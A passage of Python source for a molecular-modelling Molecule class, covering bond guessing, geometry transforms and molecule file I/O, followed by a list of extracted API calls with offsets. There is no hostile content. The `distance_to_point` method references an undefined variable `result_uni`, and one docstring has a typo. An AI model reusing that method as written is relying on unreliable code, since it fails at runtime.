0.0)) >>> h2 = Atom(symbol='H', coords=(-1.0, 0.0, 0.0)) >>> o = Atom(symbol='O', coords=(0.0, 1.0, 0.0)) >>> mol.add_atom(h1) >>> mol.add_atom(h2) >>> mol.add_atom(o) >>> mol.add_atom(Atom(symbol='C', coords=(0.0, 0.0, 0.0)), adjacent=[h1, h2, (o,2)]) """ self.atoms.append(atom) atom.mol = self if adjacent is not None: for adj in adjacent: if isinstance(adj, tuple): self.add_bond(atom, adj[0], adj[1]) else: self.add_bond(atom, adj) def delete_atom(self, atom): """Delete *atom* from this molecule. *atom* should be an |Atom| instance that belongs to the molecule. All bonds containing this atom are removed too. Examples:: >>> #delete all hydrogens >>> mol = Molecule('protein.pdb') >>> hydrogens = [atom for atom in mol if atom.atnum == 1] >>> for i in hydrogens: mol.delete_atom(i) :: >>> #delete first two atoms >>> mol = Molecule('geom.xyz') >>> mol.delete_atom(mol[1]) >>> mol.delete_atom(mol[1]) #since the second atom of original molecule is now the first """ if atom.mol != self: raise MoleculeError('delete_atom: passed atom should belong to the molecule') try: self.atoms.remove(atom) except: raise MoleculeError('delete_atom: invalid argument passed as atom') for b in reversed(atom.bonds): self.delete_bond(b) def add_bond(self, arg1, arg2=None, order=1): """Add new bond to this molecule. This method can be used in two different ways. You can call it with just one argument being a |Bond| instance (other arguments are then ignored):: >>> b = Bond(mol[2], mol[4], order=Bond.AR) #create aromatic bond between 2nd and 4th atom >>> mol.add_bond(b) Other way is to pass two atoms (and possibly bond order) and new |Bond| object will be created automatically:: >>> mol.add_bond(mol[2], mol[4], order=Bond.AR) In both cases atoms that are to be bond have to belong to the molecule, otherwise an exception is raised. """ if isinstance(arg1, Atom) and isinstance(arg2, Atom): newbond = Bond(arg1, arg2, order=order) elif isinstance(arg1, Bond): newbond = arg1 else: raise MoleculeError('add_bond: invalid arguments passed') if newbond.atom1.mol == self and newbond.atom2.mol == self: newbond.mol = self self.bonds.append(newbond) newbond.atom1.bonds.append(newbond) newbond.atom2.bonds.append(newbond) else: raise MoleculeError('add_bond: bonded atoms have to belong to the molecule') def delete_bond(self, arg1, arg2=None): """Delete bond from this molecule Just like :meth:`add_bond`, this method accepts either a single argument that is a |Bond| instance, or two arguments being instances of |Atom|. In both cases objects used as arguments have to belong to the molecule. """ if isinstance(arg1, Atom) and isinstance(arg2, Atom): delbond = self.find_bond(arg1, arg2) elif isinstance(arg1, Bond): delbond = arg1 else: raise MoleculeError('delete_bond: invalid arguments passed') if delbond in self.bonds: delbond.mol = None self.bonds.remove(delbond) delbond.atom1.bonds.remove(delbond) delbond.atom2.bonds.remove(delbond) def delete_all_bonds(self): """Delete all bonds from the molecule.""" for b in reversed(self.bonds): self.delete_bond(b) def find_bond(self, atom1, atom2): """Find and return a bond between *atom1* and *atom2*. Both atoms have to belong to the molecule. If a bond between chosen atoms does not exist, ``None`` is returned.""" if atom1.mol != self or atom2.mol != self: raise MoleculeError('find_bond: atoms passed as arguments have to belong to the molecule') for b in atom1.bonds: if atom2 is b.other_end(atom1): return b return None def set_atoms_id(self): """Equip each atom of this molecule with ``id`` attribute equal to its position within ``atoms`` list.""" for i,at in enumerate(self.atoms): at.id = i+1 def unset_atoms_id(self): """Delete ``id`` attributes of all atoms.""" for at in self.atoms: try: del at.id except AttributeError: pass def neighbors(self, atom): """Return a list of neighbors of *atom* within this molecule. *atom* has to belong to the molecule. Returned list follows the same order as ``bonds`` list of *atom*. """ if atom.mol != self: raise MoleculeError('neighbors: passed atom should belong to the molecule') return [b.other_end(atom) for b in atom.bonds] def separate(self): """Separate this molecule into connected components. Returned is a list of new |Molecule| objects (all atoms and bonds are disjoint with original molecule). Each element of this list is identical to one connected component of the base molecule. A connected component is a subset of atoms such that there exists a path (along one or more bonds) between any two atoms. Example:: >>> mol = Molecule('/xyz_dimers/NH3-H2O.xyz') >>> mol.guess_bonds() >>> print(mol) Atoms: 1 N -1.395591 -0.021564 0.000037 2 H -1.629811 0.961096 -0.106224 3 H -1.862767 -0.512544 -0.755974 4 H -1.833547 -0.330770 0.862307 5 O 1.568501 0.105892 0.000005 6 H 0.606736 -0.033962 -0.000628 7 H 1.940519 -0.780005 0.000222 Bonds: (5)--1.0--(7) (5)--1.0--(6) (1)--1.0--(3) (1)--1.0--(4) (1)--1.0--(2) >>> x = mol.separate() >>> for i in x: print(i) Atoms: 1 N -1.395591 -0.021564 0.000037 2 H -1.629811 0.961096 -0.106224 3 H -1.862767 -0.512544 -0.755974 4 H -1.833547 -0.330770 0.862307 Bonds: (1)--1.0--(3) (1)--1.0--(4) (1)--1.0--(2) Atoms: 1 O 1.568501 0.105892 0.000005 2 H 0.606736 -0.033962 -0.000628 3 H 1.940519 -0.780005 0.000222 Bonds: (1)--1.0--(3) (1)--1.0--(2) """ frags = [] clone = self.copy() for at in clone: at._visited = False def dfs(v, mol): v._visited = True v.mol = mol for e in v.bonds: e.mol = mol u = e.other_end(v) if not u._visited: dfs(u, mol) for src in clone.atoms: if not src._visited: m = Molecule() dfs(src, m) frags.append(m) for at in clone.atoms: del at._visited at.mol.atoms.append(at) for b in clone.bonds: b.mol.bonds.append(b) return frags def guess_bonds(self): """Try to guess bonds in the molecule based on types and positions of atoms. All previously existing bonds are removed. New bonds are generated based on interatomic distances and information about maximal number of bonds for each atom type (``connectors`` property, taken from |PeriodicTable|). The problem of finding molecular bonds for a given set of atoms in space does not have a general solution, especially considering the fact the chemical bond is itself not a precisely defined concept. For every method, no matter how sophisticated, there will always be corner cases for which the method produces disputable results. Moreover, depending on the context (area of application) the desired solution for a particular geometry may vary. Please do not treat this method as an oracle always providing proper solution. Algorithm used here gives very good results for geometries that are not very far from optimal geometry, especially consisting of lighter atoms. All kinds of organic molecules, including aromatic ones, usually work very well. Problematic results can emerge for transition metal complexes, transition states, incomplete molecules etc. The algorithm used scales as *n log n* where *n* is the number of atoms. .. warning:: This method works reliably only for geometries representing complete molecules. If some atoms are missing (for example, a protein without hydrogens) the resulting set of bonds would usually contain more bonds or bonds with higher order than expected. """ def element(order, ratio, atom1, atom2): eford = order if order == 1.5: eford = 1.15 elif order == 1 and {atom1.symbol, atom2.symbol} == {'C', 'N'}: eford = 1.11 return ((eford+0.9)*ratio, order, ratio, atom1, atom2) self.delete_all_bonds() dmax = 1.28 cubesize = dmax*2.1*max([at.radius for at in self.atoms]) cubes = {} for i,at in enumerate(self.atoms): at._id = i+1 at.free = at.connectors at.cube = tuple(map(lambda x: int(math.floor(x/cubesize)), at.coords)) if at.cube in cubes: cubes[at.cube].append(at) else: cubes[at.cube] = [at] neighbors = {} for cube in cubes: neighbors[cube] = [] for i in range(cube[0]-1, cube[0]+2): for j in range(cube[1]-1, cube[1]+2): for k in range(cube[2]-1, cube[2]+2): if (i,j,k) in cubes: neighbors[cube] += cubes[(i,j,k)] heap = [] for at1 in self.atoms: if at1.free > 0: for at2 in neighbors[at1.cube]: if (at2.free > 0) and (at1._id < at2._id): ratio = at1.distance_to(at2)/(at1.radius+at2.radius) if (ratio < dmax): heap.append(element(0, ratio, at1, at2)) #I hate to do this, but I guess there's no other way :/ [MH] if (at1.atnum == 16 and at2.atnum == 8): at1.free = 6 elif (at2.atnum == 16 and at1.atnum == 8): at2.free = 6 elif (at1.atnum == 7): at1.free += 1 elif (at2.atnum == 7): at2.free += 1 heapq.heapify(heap) for at in self.atoms: if at.atnum == 7: if at.free > 6: at.free = 4 else: at.free = 3 while heap: val, o, r, at1, at2 = heapq.heappop(heap) step = 1 if o in [0,2] else 0.5 if at1.free >= step and at2.free >= step: o += step at1.free -= step at2.free -= step if o < 3: heapq.heappush(heap, element(o,r,at1,at2)) else: self.add_bond(at1,at2,o) elif o > 0: if o == 1.5: o = Bond.AR self.add_bond(at1,at2,o) def dfs(atom, par): atom.arom += 1000 for b in atom.bonds: oe = b.other_end(atom) if b.is_aromatic() and oe.arom < 1000: if oe.arom > 2: return False if par and oe.arom == 1: b.order = 2 return True if dfs(oe, 1-par): b.order = 1 + par return True for at in self.atoms: at.arom = len(list(filter(Bond.is_aromatic, at.bonds))) for at in self.atoms: if at.arom == 1: dfs(at, 1) for at in self.atoms: del at.cube,at.free,at._id,at.arom #=================================================================================================== #==== Geometry operations ========================================================================== #=================================================================================================== def translate(self, vector, unit='angstrom'): """Move this molecule in space by *vector*, expressed in *unit*. *vector* should be an iterable container of length 3 (usually tuple, list or numpy array). *unit* describes unit of values stored in *vector*. """ for at in self.atoms: at.translate(vector, unit) def rotate(self, matrix): """Rotate this molecule according to rotation *matrix*. *matrix* should be a container with 9 numerical values. It can be a list (tuple, numpy array etc.) listing matrix elements row-wise, either flat (``[1,2,3,4,5,6,7,8,9]``) or in two-level fashion (``[[1,2,3],[4,5,6],[7,8,9]]``). .. note:: This method does not check if supplied matrix is a proper rotation matrix. """ for at in self.atoms: at.rotate(matrix) def rotate_bond(self, bond, atom, angle, unit='radian'): """Rotate given *bond* by an *angle* expressed in *unit*. *bond* should be chosen in such a way, that it divides the molecule into two parts (using a bond being part of a ring results in an error). *atom* has to belong to *bond* and is used to pick which "half" of the molecule is rotated. Positive angle denotes counterclockwise rotation (looking along the bond, from the stationary part of the molecule). """ if atom not in bond: raise MoleculeError('rotate_bond: atom has to belong to the bond') atoms_to_rotate = {atom} def dfs(v): for e in v.bonds: if e is not bond: u = e.other_end(v) if u not in atoms_to_rotate: atoms_to_rotate.add(u) dfs(u) dfs(atom) if len(atoms_to_rotate) == len(self): raise MoleculeError('rotate_bond: chosen bond does not divide molecule') other_end = bond.other_end(atom) v = numpy.array(other_end.vector_to(atom)) v /= numpy.linalg.norm(v) W = numpy.array([[0, -v[2], v[1]], [v[2], 0, -v[0]], [-v[1], v[0], 0]]) angle = Units.convert(angle, unit, 'radian') a1 = math.sin(angle) a2 = 2 * math.pow(math.sin(0.5 * angle), 2) rotmat = numpy.identity(3) + a1 * W + a2 * numpy.dot(W,W) trans = numpy.array(other_end.vector_to((0,0,0))) for at in atoms_to_rotate: at.translate(trans) at.rotate(rotmat) at.translate(-trans) def closest_atom(self, point, unit='angstrom'): """Return the atom of this molecule that is the closest one to some *point* in space. *point* should be an iterable container of length 3 (for example: tuple, |Atom|, list, numpy array). *unit* describes unit of values stored in *point*. """ dist = float('inf') for at in self.atoms: newdist = at.distance_to(point, unit=unit) if newdist < dist: dist = newdist ret = at return ret def distance_to_point(self, point, unit='angstrom', result_unit='angstrom'): """Calculate the distance between this molecule and some *point* in space (distance between *point* and :meth:`closest_atom`). *point* should be an iterable container of length 3 (for example: tuple, |Atom|, list, numpy array). *unit* describes unit of values stored in *point*. Returned value is expressed in *result_unit*. """ at = self.closest_atom(point, unit) return at.distance_to(point, unit, result_uni) def distance_to_mol(self, other, result_unit='angstrom', return_atoms=False): """Calculate the distance between this molecule and some *other* molecule. The distance is measured as the smallest distance between a pair of atoms, one belonging to each of the molecules. Returned distance is expressed in *result_unit*. If *return_atoms* is ``False``, only a single number is returned. If *return_atoms* is ``True``, this method returns a tuple ``(distance, atom1, atom2)`` where ``atom1`` and ``atom2`` are atoms fulfilling the minimal distance, with atom1 belonging to this molecule and atom2 to *other*. """ dist = float('inf') for at1 in self.atoms: for at2 in other.atoms: newdist = (at1.x-at2.x)**2 + (at1.y-at2.y)**2 + (at1.z-at2.z)**2 if newdist < dist: dist = newdist atom1 = at1 atom2 = at2 res = Units.convert(math.sqrt(dist), 'angstrom', result_unit) if return_atoms: return res, atom1, atom2 return res def wrap(self, length, angle=2*math.pi, length_unit='angstrom', angle_unit='radian'): """wrap(self, length, angle=2*pi, length_unit='angstrom', angle_unit='radian') Transform the molecule wrapping its x-axis around z-axis. This method is useful for building nanotubes or molecular wedding rings. Atomic coordinates are transformed in the following way: * zzzzz coordinates remain untouched * x axis gets wrapped around the circle centered in the origin of new coordinate system. Each segment of x axis of length *length* ends up as an arc of a circle subtended by an angle *angle*. The radius of this circle is R = *length*/*angle*. * part of the plane between the x axis and the line y=R is transformed into the interior of the circle, with line y=R being squashed into a single point - the center of the circle. * part of the plane above line y=R is dropped * part of the plane below x axis is transformed into outside of the circle * transformation is done in such a way that distances along y axis are preserved Before: .. image:: _static/wrap.* After: .. image:: _static/wrap2.* """ length = Units.convert(length, length_unit, 'angstrom') angle = Units.convert(angle, angle_unit, 'radian') xs = [atom.x for atom in self.atoms] if max(xs)-min(xs) > length: raise MoleculeError('wrap: x-extension of the molecule is larger than length') if angle < 0 or angle > 2*math.pi: raise MoleculeError('wrap: angle must be between 0 and 2*pi') R = length / angle def map_ring(x,y): return ((R-y) * math.cos(x/R), (R-y) * math.sin(x/R)) for at in self.atoms: at.x, at.y = map_ring(at.x, at.y) def get_center_of_mass(self, unit='angstrom'): """Return the center of mass of this molecule (as a tuple). Returned coordinates are expressed in *unit*.""" center = [0.0,0.0,0.0] total_mass = 0.0 for at in self.atoms: total_mass += at.mass for i in range(3): center[i] += at.mass*at.coords[i] for i in range(3): center[i] = Units.convert(center[i]/total_mass, 'angstrom', unit) return tuple(center) def get_mass(self): """Return mass of the molecule, expressed in atomic units.""" return sum([at.mass for at in self.atoms]) def get_formula(self): """Calculate the molecular formula for this molecule. Returned value is a single string. It contains simple molecular formula (it only includes atom types and total number of atoms of each type).""" atnums = [at.atnum for at in self.atoms] s = set(atnums) formula = '' for i in s: formula += PT.get_symbol(i) + str(atnums.count(i)) return formula #=================================================================================================== #==== Magic methods ================================================================================ #=================================================================================================== def __len__(self): """Length of a molecule is the number of atoms.""" return len(self.atoms) def __str__(self): """Return string representation of this molecule. Information about atoms are printed in ``xyz`` format fashion -- each atom in a separate, enumerated line. Then, if the molecule contains any bonds, they are printed. Each bond is printed in a separate line, with information about both atoms and bond order. Example:: Atoms: 1 N 0.00000 0.00000 0.38321 2 H 0.94218 0.00000 -0.01737 3 H -0.47109 0.81595 -0.01737 4 H -0.47109 -0.81595 -0.01737 Bonds: (1)----1----(2) (1)----1----(3) (1)----1----(4) """ s = ' Atoms: \n' for i,atom in enumerate(self.atoms): s += ('%5i'%(i+1)) + str(atom) + '\n' if len(self.bonds) > 0: for j,atom in enumerate(self.atoms): atom._tmpid = j+1 s += ' Bonds: \n' for bond in self.bonds: s += ' (%d)--%1.1f--(%d)\n'%(bond.atom1._tmpid, bond.order, bond.atom2._tmpid) for atom in self.atoms: del atom._tmpid if self.lattice: s += ' Lattice:\n' for vec in self.lattice: s += ' %10.6f %10.6f %10.6f\n'%vec return s def __iter__(self): """Iterate over atoms.""" return iter(self.atoms) def __getitem__(self, key): """Bracket notation can be used to access atoms or bonds directly. If *key* is a single int (``mymol[i]``), return i-th atom of this molecule. If *key* is a pair of ints (``mymol[(i,j)]``), return bond between i-th and j-th atom (``None`` if such a bond does not exist). This method is read only (things like ``mymol[3] = Atom(...)`` are forbidden). Numbering of atoms withing a molecule starts with 1. """ if isinstance(key, int): if key == 0: raise MoleculeError('Numbering of atoms starts with 1') if key < 0: return self.atoms[key] return self.atoms[key-1] if isinstance(key, tuple) and len(key) == 2: if key[0] == 0 or key[1] == 0: raise MoleculeError('Numbering of atoms starts with 1') return self.find_bond(self.atoms[key[0]-1], self.atoms[key[1]-1]) def __add__(self, other): """Create a new molecule that is a sum of this molecule and *other*:: >>> newmol = mol1 + mol2 The new molecule has atoms, bonds and all other elements distinct from both components. ``properties`` of ``newmol`` are ``properties`` of ``mol1`` :meth:`soft_updated<scm.plams.settings.Settings.soft_update>` with ``properties`` of ``mol2``. """ m = self.copy() m += other return m def __iadd__(self, other): """Add *other* molecule to this one:: >>> protein += water All atoms and bonds present in *other* are copied and copies are added to this molecule. ``properties`` of this molecule are :meth:`soft_updated<scm.plams.settings.Settings.soft_update>` with ``properties`` of *other*. """ othercopy = other.copy() self.atoms += othercopy.atoms self.bonds += othercopy.bonds for atom in self.atoms: atom.mol = self for bond in self.bonds: bond.mol = self self.properties.soft_update(othercopy.properties) return self def __copy__(self): return self.copy() #=================================================================================================== #==== File/format IO =============================================================================== #=================================================================================================== def readxyz(self, f, frame): def newatom(line): lst = line.split() shift = 1 if (len(lst) > 4 and lst[0] == str(i)) else 0 num = lst[0+shift] if isinstance(num, str): num = PT.get_atomic_number(num) self.add_atom(Atom(atnum=num, coords=(lst[1+shift],lst[2+shift],lst[3+shift]))) def newlatticevec(line): lst = line.split() self.lattice.append((float(lst[1]),float(lst[2]),float(lst[3]))) fr = frame begin, first, nohead = True, True, False for line in f: if first: if line.strip() == '' : continue first = False try: n = int(line.strip()) fr -= 1 except ValueError: nohead = True newatom(line) elif nohead: if line.strip() == '' : break if 'VEC' in line.upper(): newlatticevec(line) else: newatom(line) elif fr != 0: try: n = int(line.strip()) fr -= 1 except ValueError: continue else: if begin: begin = False i = 1 if line: self.properties['comment'] = line.rstrip() else: if i <= n: newatom(line) i += 1 elif 'VEC' in line.upper(): newlatticevec(line) else: break if not nohead and fr > 0: raise FileError('readxyz: There are only %i frames in %s' % (frame - fr, f.name)) def writexyz(self, f): f.write(str(len(self)) + '\n') if 'comment' in self.properties: comment = self.properties['comment'] if isinstance(comment, list): comment = comment[0] f.write(comment) f.write('\n') for at in self.atoms: f.write(str(at) + '\n') for i,vec in enumerate(self.lattice): f.write('VEC'+str(i+1) + '%14.6f %14.6f %14.6f\n'%tuple(vec)) def readmol(self, f, frame): if frame != 1: raise FileError('readmol: .mol files do not support multiple geometries') comment = [] for i in range(4): line = f.readline().rstrip() if line: spl = line.split() if spl[len(spl)-1] == 'V2000': natom = int(spl[0]) nbond = int(spl[1]) for j in range(natom): atomline = f.readline().split() crd = tuple(map(float, atomline[0:3])) symb = atomline[3] try: num = PT.get_atomic_number(symb) except PTError: num = 0 self.add_atom(Atom(atnum=num, coords=crd)) for j in range(nbond): bondline = f.readline().split() at1 = self.atoms[int(bondline[0]) - 1] at2 = self.atoms[int(bondline[1]) - 1] ordr = int(bondline[2]) if ordr == 4: ordr = Bond.AR self.add_bond(Bond(atom1=at1, atom2=at2, order=ordr)) break elif spl[len(spl)-1] == 'V3000': raise FileError('readmol: Molfile V3000 not supported. Please convert') else: comment.append(line) if comment: self.properties['comment'] = comment def writemol(self, f): commentblock = ['\n']*3 if 'comment' in self.properties: comment = self.properties['comment'] if isinstance(comment, str): commentblock[0] = comment + '\n' elif isinstance(comment, list): comment = comment[0:3] while len(comment) < 3: comment.append('') commentblock = [a+b for a,b in zip(comment,commentblock)] f.writelines(commentblock) self.set_atoms_id() f.write('%3i%3i 0 0 0 0 0 0 0 0999 V2000\n' % (len(self.atoms),len(self.bonds))) for at in self.atoms: f.write('%10.4f%10.4f%10.4f %-3s 0 0 0 0 0 0\n' % (at.x,at.y,at.z,at.symbol)) for bo in self.bonds: order = bo.order if order == Bond.AR: order = 4 f.write('%3i%3i%3i 0 0 0\n' % (bo.atom1.id,bo.atom2.id,order)) self.unset_atoms_id() f.write('M END\n') def readmol2(self, f, frame): if frame != 1: raise MoleculeError('readmol: .mol2 files do not support multiple geometries') bondorders = {'1':1, '2':2, '3':3, 'am':1, 'ar':Bond.AR, 'du':0, 'un':1, 'nc':0} mode = ('', 0) for i, line in enumerate(f): line = line.rstrip() if not line: continue elif line[0] == '#': continue elif line[0] == '@': line = line.partition('>')[2] if not line: raise FileError('readmol2: Error in %s line %i: invalid @ record' % (f.name, str(i+1))) mode = (line, i) elif mode[0] == 'MOLECULE': pos = i - mode[1] if pos == 1: self.properties['name'] = line elif pos == 3: self.properties['type'] = line elif pos == 4: self.properties['charge_type'] = line elif pos == 5: self.properties['flags'] = line elif pos == 6: self.properties['comment'] = line elif mode[0] == 'ATOM': spl = line.split() if len(spl) < 6: raise FileError('readmol2: Error in %s line %i: not enough values in line' % (f.name, str(i+1))) symb = spl[5].partition('.')[0] try: num = PT.get_atomic_number(symb) except PTError: num = 0 crd = tuple(map(float, spl[2:5])) newatom = Atom(atnum=num, coords=crd, name=spl[1], type=spl[5]) if len(spl) > 6: newatom.properties['subst_id'] = spl[6] if len(spl) > 7: newatom.properties['subst_name'] = spl[7] if len(spl) > 8: newatom.properties['charge'] = float(spl[8]) if len(spl) > 9: newatom.properties['flags'] = spl[9] self.add_atom(newatom) elif mode[0] == 'BOND': spl = line.split() if len(spl) < 4: raise FileError('readmol2: Error in %s line %i: not enough values in line' % (f.name, str(i+1))) try: atom1 = self.atoms[int(spl[1])-1] atom2 = self.atoms[int(spl[2])-1] except IndexError: raise FileError('readmol2: Error in %s line %i: wrong atom ID' % (f.name, str(i+1))) newbond = Bond(atom1, atom2, order=bondorders[spl[3]]) if len(spl) > 4: for flag in spl[4].split('|'): newbond.properties[flag] = True self.add_bond(newbond) def writemol2(self, f): bondorders = ['1','2','3','ar'] def write_prop(name, obj, separator, space=0, replacement=None): form_str = '%-' + str(space) + 's' if name in obj.properties: f.write(form_str % str(obj.properties[name])) elif replacement is not None: f.write(form_str % str(replacement)) f.write(separator) f.write('@<TRIPOS>MOLECULE\n') write_prop('name', self, '\n') f.write('%i %i\n' % (len(self.atoms),len(self.bonds))) write_prop('type', self, '\n') write_prop('charge_type', self, '\n') write_prop('flags', self, '\n') write_prop('comment', self, '\n') f.write('\n@<TRIPOS>ATOM\n') for i,at in enumerate(self.atoms): f.write('%5i ' % (i+1)) write_prop('name', at, ' ', 5, at.symbol+str(i+1)) f.write('%10.4f %10.4f %10.4f ' % at.coords) write_prop('type', at, ' ', 5, at.symbol) write_prop('subst_id', at, ' ', 5) write_prop('subst_name', at, ' ', 7) write_prop('charge', at, ' ', 6) write_prop('flags', at, '\n') at.id = i+1 f.write('\n@<TRIPOS>BOND\n') for i,bo in enumerate(self.bonds): f.write('%5i %5i %5i %4s' % (i+1, bo.atom1.id, bo.atom2.id, bondorders[bo.order])) write_prop('flags', bo, '\n') self.unset_atoms_id() def readpdb(self, f, frame): pdb = PDBHandler(f) models = pdb.get_models() if frame > len(models): raise FileError('readpdb: There are only %i frames in %s' % (len(models), f.name)) symbol_columns = [70,6,7,8] for i in models[frame-1]: if i.name in ['ATOM ','HETATM']: x = float(i.value[0][24:32]) y = float(i.value[0][32:40]) z = float(i.value[0][40:48]) for n in symbol_columns: symbol = i.value[0][n:n+2].strip() try: atnum = PT.get_atomic_number(symbol) break except PTError: if n == symbol_columns[-1]: raise FileError('readpdb: Unable to deduce the atomic symbol in the following line:\n%s'%(i.name+i.value[0])) self.add_atom(Atom(atnum=atnum,coords=(x,y,z))) return pdb def writepdb(self, f): pdb = PDBHandler() pdb.add_record(PDBRecord('HEADER')) model = [] for i,at in enumerate(self.atoms): s = 'ATOM %5i %8.3f%8.3f%8.3f %2s ' % (i+1,at.x,at.y,at.z,at.symbol.upper()) model.append(PDBRecord(s)) pdb.add_model(model) pdb.add_record(pdb.calc_master()) pdb.add_record(PDBRecord('END')) pdb.write(f) def read(self, filename, inputformat=None, frame=1): """Read molecular coordinates from file. *filename* should be a string with a path to the file. If *inputformat* is not ``None``, it should be one of supported formats (keys occurring in class attribute ``_readformat``). Otherwise, format of the file is deduced from file's extension (for files without extension `xyz` format is assumed). If chosen format allows multiple geometries in a single file, *frame* can be used to pick one of them. """ if inputformat is None: fsplit = filename.rsplit('.',1) if len(fsplit) == 2: inputformat = fsplit[1] else: inputformat = 'xyz' if inputformat in self.__class__._readformat: with open(filename, 'rU') as f: ret = self._readformat[inputformat](self, f, frame) return ret else: raise MoleculeError('read: Unsupported file format') def write(self, filename, outputformat=None): """Write molecular coordinates to a file. *filename* should be a string with a path to the file. If *outputformat* is not ``None``, it should be one of supported formats (keys occurring in class attribute ``_writeformat``). Otherwise, format of the file is deduced from file's extension (for files without extension `xyz` format is assumed). """ if outputformat is None: fsplit = filename.rsplit('.',1) if len(fsplit) == 2: outputformat = fsplit[1] else: outputformat = 'xyz' if outputformat in self.__class__._writeformat: with open(filename, 'w') as f: self._writeformat[outputformat](self, f) else: raise MoleculeError('write: Unsupported file format') _readformat = {'xyz':readxyz, 'mol':readmol, 'mol2':readmol2, 'pdb':readpdb} _writeformat = {'xyz':writexyz, 'mol':writemol, 'mol2':writemol2, 'pdb': writepdb} #=================================================================================================== #==== JSON IO ====================================================================================== #=================================================================================================== def as_dict(self): """ The Molecule information is stored in a dict based on the mol `file format <http://onlinelibrarystatic.wiley.com/marvin/help/FF/19693841.html>` :returns: JSON object """ # def create_atom_ids(mol): # """ # Generate unique identifier for each atom # :parameter mol: Molecule object containing the atoms # :type mol: |Molecule| # """ # ds = [] # for i,self.assertTrue() in enumerate(mol.atoms): # idx = "atom_" + str(i) # ds.append(idx) # return ds def create_atom_block(mol): """ In this block are stored the atomic number, coordinates, atomic symbols and others properties that are passed as a *Setting* object. :parameter mol: Molecule object containing the atoms :type mol: |Molecule| :parameter ids: List of unique identifier :type ids: [Int] """ return [{'coords': at.coords, 'symbol': at.symbol, 'atnum': at.atnum, 'properties': at.properties.as_dict()} for at in mol.atoms] def create_bond_block(mol): """ :parameter mol: Molecule object containing the atoms :type mol: |Molecule| :parameter ids: List of unique identifier :type ids: [Int] The data list on table bellow is used to store information related to the bonds. ================= ===================== Meaning Value ================== ===================== First atom number Int Second atom number Int Bond type Int (float for aromatic) #. Single #. Double #. Triple #. Aromatic Properties Settings ================== ===================== """ def get_bond_order(bond): if bond.order: return bond.order elif bond.AR: return bond.AR else: msg = "bond does not contain order attribute" raise AttributeError(msg) # Represent the atoms involved in the bond like references # to the unique identifiers stored in the ``atomBlock`` # dict_atom2id = {at: idx for (at, idx) in zip(mol.atoms, ids)} bonds_list = [] for i, b in enumerate(mol.bonds): atom1 = mol.atoms.index(b.atom1) atom2 = mol.atoms.index(b.atom2) order = get_bond_order(b) bond = {'atom1': atom1, 'atom2': atom2, 'order': order, 'properties': b.properties.as_dict()} bonds_list.append(bond) return bonds_list d = dict() d["atomBlock"] = create_atom_block(self) d["bondBlock"] = create_bond_block(self) d["properties"] = self.properties return d @classmethod def from_dict(cls, atomBlock, bondBlock, properties): """ Generate a new Molecule instance using the data stored in the dictionary representing the JSON serialized data :parameter ds: Dict containing the JSON serialized molecule :type ds: Dict :returns: |Molecule| """ # New Molecule instance mol = cls() # dict from unique atom identifiers to numeration # inside the molecule # Reconstruct the Atom instances using the Json data for at in atomBlock: atnum = at["atnum"] coords = at["coords"] symbol = at["symbol"] props = at["properties"] mol.add_atom(Atom(atnum=atnum, coords=coords, symbol=symbol, **props)) # Reconstruct the bonds using the internal numeration of the molecule # build in the previous step. for b in bondBlock: id_atom1 = b["atom1"] id_atom2 = b["atom2"] atom1 = mol.atoms[id_atom1] atom2 = mol.atoms[id_atom2] bond = Bond(atom1=atom1, atom2=atom2, order=b["order"], **b["properties"]) mol.add_bond(bond) mol.properties = properties return mol
[ "copy.deepcopy", "heapq.heapify", "math.sqrt", "os.path.basename", "math.floor", "numpy.identity", "math.sin", "heapq.heappop", "math.acos", "numpy.array", "numpy.linalg.norm", "math.cos", "numpy.dot" ]
[((22720, 22739), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (22733, 22739), False, 'import copy\n'), ((35178, 35197), 'heapq.heapify', 'heapq.heapify', (['heap'], {}), '(heap)\n', (35191, 35197), False, 'import heapq\n'), ((39008, 39028), 'numpy.linalg.norm', 'numpy.linalg.norm', (['v'], {}), '(v)\n', (39025, 39028), False, 'import numpy\n'), ((39042, 39109), 'numpy.array', 'numpy.array', (['[[0, -v[2], v[1]], [v[2], 0, -v[0]], [-v[1], v[0], 0]]'], {}), '([[0, -v[2], v[1]], [v[2], 0, -v[0]], [-v[1], v[0], 0]])\n', (39053, 39109), False, 'import numpy\n'), ((39227, 39242), 'math.sin', 'math.sin', (['angle'], {}), '(angle)\n', (39235, 39242), False, 'import math\n'), ((9726, 9740), 'math.sqrt', 'math.sqrt', (['res'], {}), '(res)\n', (9735, 9740), False, 'import math\n'), ((11241, 11261), 'math.acos', 'math.acos', (['(num / den)'], {}), '(num / den)\n', (11250, 11261), False, 'import math\n'), ((22574, 22593), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (22587, 22593), False, 'import copy\n'), ((35432, 35451), 'heapq.heappop', 'heapq.heappop', (['heap'], {}), '(heap)\n', (35445, 35451), False, 'import heapq\n'), ((41614, 41629), 'math.sqrt', 'math.sqrt', (['dist'], {}), '(dist)\n', (41623, 41629), False, 'import math\n'), ((11748, 11767), 'numpy.array', 'numpy.array', (['matrix'], {}), '(matrix)\n', (11759, 11767), False, 'import numpy\n'), ((11827, 11851), 'numpy.array', 'numpy.array', (['self.coords'], {}), '(self.coords)\n', (11838, 11851), False, 'import numpy\n'), ((39269, 39290), 'math.sin', 'math.sin', (['(0.5 * angle)'], {}), '(0.5 * angle)\n', (39277, 39290), False, 'import math\n'), ((39313, 39330), 'numpy.identity', 'numpy.identity', (['(3)'], {}), '(3)\n', (39327, 39330), False, 'import numpy\n'), ((39347, 39362), 'numpy.dot', 'numpy.dot', (['W', 'W'], {}), '(W, W)\n', (39356, 39362), False, 'import numpy\n'), ((21675, 21701), 'os.path.basename', 'os.path.basename', (['filename'], {}), '(filename)\n', (21691, 21701), False, 'import os\n'), ((43485, 43500), 'math.cos', 'math.cos', (['(x / R)'], {}), '(x / R)\n', (43493, 43500), False, 'import math\n'), ((43508, 43523), 'math.sin', 'math.sin', (['(x / R)'], {}), '(x / R)\n', (43516, 43523), False, 'import math\n'), ((33757, 33781), 'math.floor', 'math.floor', (['(x / cubesize)'], {}), '(x / cubesize)\n', (33767, 33781), False, 'import math\n')]
